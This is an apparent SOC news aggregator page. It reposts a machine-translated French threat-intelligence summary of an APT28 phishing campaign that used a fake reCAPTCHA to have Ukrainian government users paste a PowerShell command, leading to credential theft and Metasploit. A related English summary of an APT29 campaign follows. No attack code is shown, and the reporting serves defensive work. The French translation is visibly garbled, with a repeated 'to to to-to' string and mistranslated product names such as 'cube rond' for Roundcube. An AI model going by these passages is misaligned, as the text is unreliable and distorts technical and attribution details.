SOC News: Article

One Article Review

Accueil - L'article:

Source	RiskIQ
Identifiant	8602832
Date de publication	2024-10-28 12:22:25 (vue: 2024-10-28 13:07:20)
Titre	Cyberattack UAC-0001 (APT28): Commande PowerShell dans le presse-papiers comme "point d'entrée" Cyberattack UAC-0001 (APT28): PowerShell command in the clipboard as an "entry point"
Texte	#### Géolocations ciblées - Ukraine #### Industries ciblées - agences et services gouvernementaux ## Instantané L'équipe gouvernementale d'intervention d'urgence informatique d'Ukraine (CER-UA) enquête sur les e-mails de phishing ciblant les gouvernements locaux ukrainiens, déguisé par le "remplacement de la table" du sujet et contenant un lien malveillant imitant les feuilles de Google.Cette activité, qui tire parti de l'ingénierie sociale et du PowerShell pour voler des informations d'identification et déployer Metasploit, est probablement liée à l'acteur de menace russe APT28, suivi par Microsoft comme [Forest Blizzard] (https://sip.security.microsoft.com/intel-profiles/ DD75F93B2A771C9510DCEEC817B9D34D868C2D1353D08C8C1647DE067270FDF8). ## Description En cliquant sur le lien dans l'e-mail, les utilisateurs sont présentés avec une fausse invite Recaptcha.Suivant les instructions de l'invite \\ lance une commande PowerShell qui télécharge et exécute des fichiers permettant un tunneling SSH, un vol d'identification du navigateur (de Chrome, Edge, Opera, Firefox) et le déploiement Metasploit sur la machine compromise. CERT-UA note un incident connexe en septembre 2024, où [les attaquants ont exploité une vulnérabilité du cube rond] (https://sip.security.microsoft.com/intel-explorer/articles/7c0b1160) ([CVE-2023-43770] (https: //sip.security.microsoft.com/intel-explorer/cves/cve-2023-43770/)) pour intercepter les données de messagerie et rediriger les boîtes aux lettres vers l'adresse de l'attaquant \\.Les deux attaques ont utilisé un serveur compromis, "Mail.zhblz \ [. \] Com", et plus de 10 comptes de messagerie gouvernementaux ont été compromis et surveillés par les attaquants pour répandre les exploits, atteignant même les services de défense à l'étranger. ## Analyse Microsoft et contexte OSINT supplémentaire Le groupe Microsoft suit en tant que Forest Blizzard (Strontium) est un acteur de menace parrainé par l'État russe qui cible principalement le gouvernement, l'énergie, les transports et les organisations non gouvernementales aux États-Unis, en Europe et au Moyen-Orient.Microsoft a également observé Forest Blizzard (Strontium) ciblant les médias, les technologies de l'information, les organisations sportives et les établissements d'enseignement du monde entier.Les «gouvernements des États-Unis et du Royaume-Uni] (https://media.defense.gov/2021/jul/01/2002753896/-1/-1/1/csa_gru_global_brute_force_campaign_uoo158036-21.pdf) ont lié Blizzard forestier (Strontium) to to to to to to to-to to to-to to to-toUnité 26165 de l'Agence de renseignement militaire de la Fédération de Russie: Direction principale du renseignement de l'état-major général des forces armées de la Fédération de Russie (GRU). D'autres chercheurs en sécurité ont également rendu compte des attaquants exploitant une vulnérabilité du cube rond à cibler les gouvernements d'Europe centrale.En octobre, [des chercheurs de Positive Technologies identifiés] (https: //sip.security.microsoft.com/intel-explorer/articles/7c0b1160) Une campagne exploitant une vulnérabilité de script de sites croisées stockée (XSS) dans le CLI de la femme Web RoundcubeENT, ciblant les organisations gouvernementales dans la région de la CIS.La vulnérabilité, [CVE-2024-37383] (https://sip.security.microsoft.com/intel-explorer/cves/cve-2024-37383/?tid=72F988BF-86F1-41AF-91AB-2D7CD011DB47), AuthorL'exécution du code JavaScript malveillant sur la page RoundCube lorsqu'un e-mail spécialement conçu est ouvert.Positive Technologies n'a pas attribué publiquement l'attaque. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/en-us/defender-endpoint/linux-preférences) dans Microsoft Defender Antivirus ou l'équivalent de votre produit antivirus pour couvrir rapidement les outils d'attaquant en évolutio
Notes	★★★★
Envoyé	Oui
Condensat	#### © 0001 1/1/csa 2023 2024 2024 21562b1004d5/analystreport 26165 2d7cd011db47 365/security/defender 37383 37383/ 41af 43770 43770/ 4b5e 5155 86f1 91ab abroad access accessed accounts action activity actor additional address af74 against age agencies agency: alert alerts all allow allows also analysis antivirus any apt28 are armed artifacts attack attacker attackers attacks attributed authority automated based behind blizzard block both breach breaches browser brute campaign can central cert changes chrome cis clicking client clipboard cloud code com com/en com/intel com/microsoft com/threatanalytics3/9382203e command common compromised computer configure containing content context controlled copyright cover crafted credential credentials criterion cross customers cve cyberattack data defend defender defense delivered departments deploy deployment description detect detected directorate disguised distribution does downloads east edge edr educational email emails emergency enable enabled enabling endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent energy engineering ensure entry equivalent europe european even evolving executable execution exploited exploiting exploits explorer/articles/7c0b1160 explorer/cves/cve fake federation files firefox folder folders follow following force forces forest from full general geolocations global google gov gov/2021/jul/01/2002753896/ government governmental governments group gru hardening has have https://cert https://learn https://media https://security https://sip identified immediate impact incident industries information institutions instructions intelligence intercept investigating investigation investigations javascript kingdom launches learndoc learning leverages like likely link linked list local lsa lsass machine mail mailboxes main majority malicious manage media meet metasploit microsoft middle military mimicking mitigations mode monitored network new non not notes observed ocid=magicti october opened opera organizations osint other over overview page part passive pdf permission phishing point positive post powershell preferences premises presented prevalence prevent primarily product profiles/dd75f93b2a771c9510dceec817b9d34d868c2d1353d08c8c1647de067270fdf8 prohibited prompt protection protection#how protections publicly ransomware rapidly reaching recaptcha recommendations recommends redirect reduce reducing reduction reference#block references region related remediate remediation replacement reported reproduction researchers reserved resolve response rights roundcube rule rules run running runs russian scenes scripting security september server services settings sheets significantly site snapshot social specially sponsored sports spread ssh staff state states steal stealing stored strontium subject subsystem surface table take tamper target targeted targeting targets team techniques technologies technology theft thereof the threat threats tid=72f988bf tools tracked tracks transportation trusted tunneling turn ua/article/6281123 uac ukraine ukrainian unit united unknown unless uoo158036 upon us/defender used users view=o365 volume vulnerability webmail when where which windows without works worldwide written xdr xss your zhblz have the
Tags	Ransomware Tool Vulnerability Threat
Stories	APT 28
Move

L'article ne semble pas avoir été repris aprés sa publication.

L'article ressemble à 1 autre(s) article(s):

Src	Date (GMT)	Titre	Description	Tags	Stories	Notes
	2024-10-28 22:05:17	(Déjà vu) Amazon a identifié les domaines Internet maltraités par APT29 Amazon identified internet domains abused by APT29 (lien direct)	## Snapshot Amazon, building on reporting by the Computer Emergency Response Team of Ukraine (CERT-UA), identifed and disrupted a phishing campaign attributed to [Midnight Blizzard](https://security.microsoft.com/intel-explorer/articles/2c8cb717). ## Description The campaign, active since at least August 2024, has a broad target set and includes entities related to government, enterprise, and military in countries of interest to Russia. The group leveraged Ukrainian language phishing emails to collect its targets\' Windows credentials through Microsoft Remote Desktop. Many of the domains used by Midnight Blizzard spoofed Amazon Web Services (AWS), among other organizations. Amazon has siezed many of the domains to disrupt the campaign. ## Microsoft Analysis and Additional OSINT Context Microsoft attributes this malicious activity to [Midnight Blizzard](https://security.microsoft.com/intel-explorer/articles/2c8cb717) based on the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) reported by Amazon and CERT-UA. The actor Microsoft tracks as Midnight Blizzard is known to primarily target governments, diplomatic entities, NGOs, and IT service providers in primarily the United States and Europe. Their focus is to collect intelligence through longstanding and dedicated espionage of foreign interests that can be traced to early 2018 by leveraging the use of identity. Midnight Blizzard is consistent and persistent in their operational targeting and their objectives rarely change. They utilize diverse initial access methods ranging from stolen credentials to supply chain attacks, exploitation of on-premises environments to laterally move to the cloud, exploitation of service providers\' trust chain to gain access to downstream customers, and the Active Directory Federation Services (ADFS) malware known as FOGGYWEB and MAGICWEB. Midnight Blizzard is tracked by partner security companies as APT29, UNC2452, and Cozy Bear. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats. - Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access. - Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint. - Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint. - Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport) to defend against common credential theft techniques like LSASS access. - [Enable](https://learn.microsoft.com/en-u	Ransomware Malware Tool Threat Cloud	APT 29	★★★